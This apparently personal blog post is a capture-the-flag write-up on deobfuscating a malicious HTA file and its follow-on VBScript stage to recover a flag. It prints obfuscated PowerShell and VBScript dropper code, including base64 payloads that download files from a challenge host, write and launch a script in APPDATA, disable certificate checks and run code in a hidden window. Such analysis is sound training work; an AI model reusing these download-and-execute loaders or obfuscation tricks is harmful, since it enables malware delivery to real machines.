# Wanted Alive ## OVERVIEW --- ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766828868346/96f03591-88cf-4d62-823c-5d14ca107ad7.png align="center") So we are given file to download and an instance to spawn Let’s do it and see what’s inside the zip So we found a **wanted.hta file** let’s see its file type and its contents ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766829229625/536fbd37-b1c7-429b-8fde-0602162e94ed.png align="center") Its a HTML document with ASCII text which is very long so when i inspected the file contents it looked like URL encoded so let’s drop the whole file in Cyberchef Tool Online ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766829663195/b7856b17-1be7-43ff-b3bf-e3528c4d395c.png align="center") Use the import file button to import the file and then click on the magic wand beside the Output Heading to decode the content So as you can see we got the decoded content but there are too much whitespace inside it let’s use the **remove whitespace** recipe in cyberchef to remove it ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766829913056/9b7f0339-84b4-4798-80c0-4b95b6b77c73.png align="center") so we get the final script as ```apache ``` As you can see in the above script that ```apache PowErShEll -ExBYPaSS -NOP -W 1 -C DEVIcEcrEDEnTIAlDePlOYmENt.EXe; iex($(iEX('[SYsTeM.TeXt.EnCoding]'[chAr]0X3A[CHAr]0X3A'uTf8.geTSTring([SYstem.ConVERT]'[chAR]58[CHAR]58'fRoMBASE64string( ``` It shows that the string inside that is base64encoded so let’s decode it in cyberchef so the base64encoded string is ```apache JGVhNmM4bXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlckRlZmluSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OLmRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENmbXIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVV2eVZCUkQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZmWWxEb2wsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb0ZYckloKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3V4dFBJQkp4bCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbklZcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZWE2YzhtclQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly93YW50ZWQuYWxpdmUuaHRiLzM1L3dhbnRlZC50SUYiLCIkZU52OkFQUERBVEFcd2FudGVkLnZicyIsMCwwKTtTVEFSdC1zbGVlUCgzKTtzdEFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcd2FudGVkLnZicyI= ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766830289709/8cd78a53-d881-4505-b9ee-0e57209a6fc0.png align="center") It successfully decoded and it points to Download File from **http://wanted.alive.htb/35/wanted.tIF** so let’s grab the **wanted.tIF** file real quick **NOTE: here for downloading the file, In place of http://wanted.alive.htb/ use the instance IP and Port If you are using Windows otherwise add the IP in /etc/hosts in Linux** So after visiting the URL above we can get the file now let’s inspect its content now using **cat wanted.tIF** On inspecting the **.tIF** file you will find the below part of code in the middle ```apache If Not mesor() Then On Error Resume Next latifoliado = "U2V0LUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLVNjb3BlIFByb2Nlc3MgLUZvcmNlOyBbU3lzdGVtLk5ldC5TZd2FudGVkCgXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sgPSB7JHRydWV9O1td2FudGVkCgTe" latifoliado = latifoliado & "XN0ZW0uTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW1N5c3RlbS5OZXQuU2Vydmld2FudGVkCgjZVBvaW50TWFuYWdlcl06OlNlY3VyaXR5UHJvdG9jb2wgLWJvciAzMDcyOyBpZXggKFtTeXN0ZW0uVGV4dC5FbmNvZd2FudGVkCgGl" latifoliado = latifoliado & "uZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKG5ldy1vYmplY3Qgcd2FudGVkCg3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vd2FudGVkLmFsaXZlLmh0Yi9jZGJhL19d2FudGVkCgyc" latifoliado = latifoliado & "CcpKSkpd2FudGVkCgd2FudGVkCg" Dim parrana parrana = "d2FudGVkCg" Dim arran arran =" d2FudGVkCg d2FudGVkCg " arran = arran & "$d2FudGVkCgCod2FudGVkCgd" arran = arran & "id2FudGVkCggod2FudGVkCg " arran = arran & "d2FudGVkCg" & latifoliado & "d2FudGVkCg" arran = arran & "$d2FudGVkCgOWd2FudGVkCgj" arran = arran & "ud2FudGVkCgxdd2FudGVkCg " arran = arran & "=d2FudGVkCg [d2FudGVkCgs" arran = arran & "yd2FudGVkCgstd2FudGVkCge" arran = arran & "md2FudGVkCg.Td2FudGVkCge" arran = arran & "xd2FudGVkCgt.d2FudGVkCge" arran = arran & "nd2FudGVkCgcod2FudGVkCgd" arran = arran & "id2FudGVkCgngd2FudGVkCg]" arran = arran & ":d2FudGVkCg:Ud2FudGVkCgT" arran = arran & "Fd2FudGVkCg8.d2FudGVkCgG" arran = arran & "ed2FudGVkCgtSd2FudGVkCgt" arran = arran & "rd2FudGVkCgind2FudGVkCgg" arran = arran & "(d2FudGVkCg[sd2FudGVkCgy" arran = arran & "sd2FudGVkCgted2FudGVkCgm" arran = arran & ".d2FudGVkCgCod2FudGVkCgn" arran = arran & "vd2FudGVkCgerd2FudGVkCgt" arran = arran & "]d2FudGVkCg::d2FudGVkCgF" arran = arran & "rd2FudGVkCgomd2FudGVkCgb" arran = arran & "ad2FudGVkCgsed2FudGVkCg6" arran = arran & "4d2FudGVkCgStd2FudGVkCgr" arran = arran & "id2FudGVkCgngd2FudGVkCg(" arran = arran & "$d2FudGVkCgcod2FudGVkCgd" arran = arran & "id2FudGVkCggod2FudGVkCg)" arran = arran & ")d2FudGVkCg;pd2FudGVkCgo" arran = arran & "wd2FudGVkCgerd2FudGVkCgs" arran = arran & "hd2FudGVkCgeld2FudGVkCgl" arran = arran & ".d2FudGVkCgexd2FudGVkCge" arran = arran & " d2FudGVkCg-wd2FudGVkCgi" arran = arran & "nd2FudGVkCgdod2FudGVkCgw" arran = arran & "sd2FudGVkCgtyd2FudGVkCgl" arran = arran & "ed2FudGVkCg hd2FudGVkCgi" arran = arran & "dd2FudGVkCgded2FudGVkCgn" arran = arran & " d2FudGVkCg-ed2FudGVkCgx" arran = arran & "ed2FudGVkCgcud2FudGVkCgt" arran = arran & "id2FudGVkCgond2FudGVkCgp" arran = arran & "od2FudGVkCglid2FudGVkCgc" arran = arran & "yd2FudGVkCg bd2FudGVkCgy" arran = arran & "pd2FudGVkCgasd2FudGVkCgs" arran = arran & " d2FudGVkCg-Nd2FudGVkCgo" arran = arran & "Pd2FudGVkCgrod2FudGVkCgf" arran = arran & "id2FudGVkCgled2FudGVkCg " arran = arran & "-d2FudGVkCgcod2FudGVkCgm" arran = arran & "md2FudGVkCgand2FudGVkCgd" arran = arran & " d2FudGVkCg$Od2FudGVkCgW" arran = arran & "jd2FudGVkCguxd2FudGVkCgD" arran = descortinar(arran, parrana, "") Dim sandareso sandareso = "pd2FudGVkCgo" sandareso = sandareso & "wd2FudGVkCgr" sandareso = sandareso & "sd2FudGVkCge" sandareso = sandareso & "ld2FudGVkCgl -cd2FudGVkCgommad2FudGVkCgnd " sandareso = descortinar(sandareso, parrana, "") sandareso = sandareso & arran Dim incentiva Set incentiva = CreateObject("WScript.Shell") incentiva.Run sandareso, 0, False WScript.Quit(rumbo) End If ``` At first glance, it looked like random garbage, but on closer inspection it was base64 sprinkled with noise markers (the string `d2FudGVkCg`). These markers were intentionally inserted to break up the **first four line base64 encoded payload** and prevent direct decoding, The VBScript logic was essentially concatenating these fragments into a single base64 string, then passing it to a decoding function. To recover the real payload manually, I Collected all the fragments into one string, Removed every occurrence of the marker `d2FudGVkCg` and made sure the result was valid base64 and decoded it. This process can be easily reproduced in CyberChef by using ***Find&Replace*** (replace `d2FudGVkCg` with nothing) followed by a ***From Base64*** operation. ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766830955505/8c773992-ae2d-4ba6-b5e3-d9e332a980b6.png align="center") So you can either do it using Find / Replace But I prefer **Manual Way** to avoid any problem So the string we got after cleaning is ```apache U2V0LUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLVNjb3BlIFByb2Nlc3MgLUZvcmNlOyBbU3lzdGVtLk5ldC5TZd2FudGVkCgXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sgPSB7JHRydWV9O1td2FudGVkCgTeXN0ZW0uTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW1N5c3RlbS5OZXQuU2Vydmld2FudGVkCgjZVBvaW50TWFuYWdlcl06OlNlY3VyaXR5UHJvdG9jb2wgLWJvciAzMDcyOyBpZXggKFtTeXN0ZW0uVGV4dC5FbmNvZd2FudGVkCgGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKG5ldy1vYmplY3Qgcd2FudGVkCg3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vd2FudGVkLmFsaXZlLmh0Yi9jZGJhL19d2FudGVkCgycCcpKSkpd2FudGVkCgd2FudGVkCg ``` Now we have to remove the string that is setted to avoid direct decoding which is **d2FudGVkCg** We can use Cyberchef for it ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766831253275/9582b5e5-b9ea-4520-971b-624b333f694b.png align="center") Now we got the decoded message in which it is pointing towards another web address let’s visit that ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766831370676/b96d7f47-e9b1-4263-9e6c-74dff599ef42.png align="left") And BOOM! we got our Flag!!! ## **WE FINALLY DID IT !!!! CHALLENGE SOLVED !!** ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766831469798/8d7ae4ff-307e-4015-8665-74edc7293b97.png align="center") For Any Query Or Problem Either Leave A Comment Or Contact At [**reapsec.com**](http://reapsec.com/) **THANKS FOR READING !!!**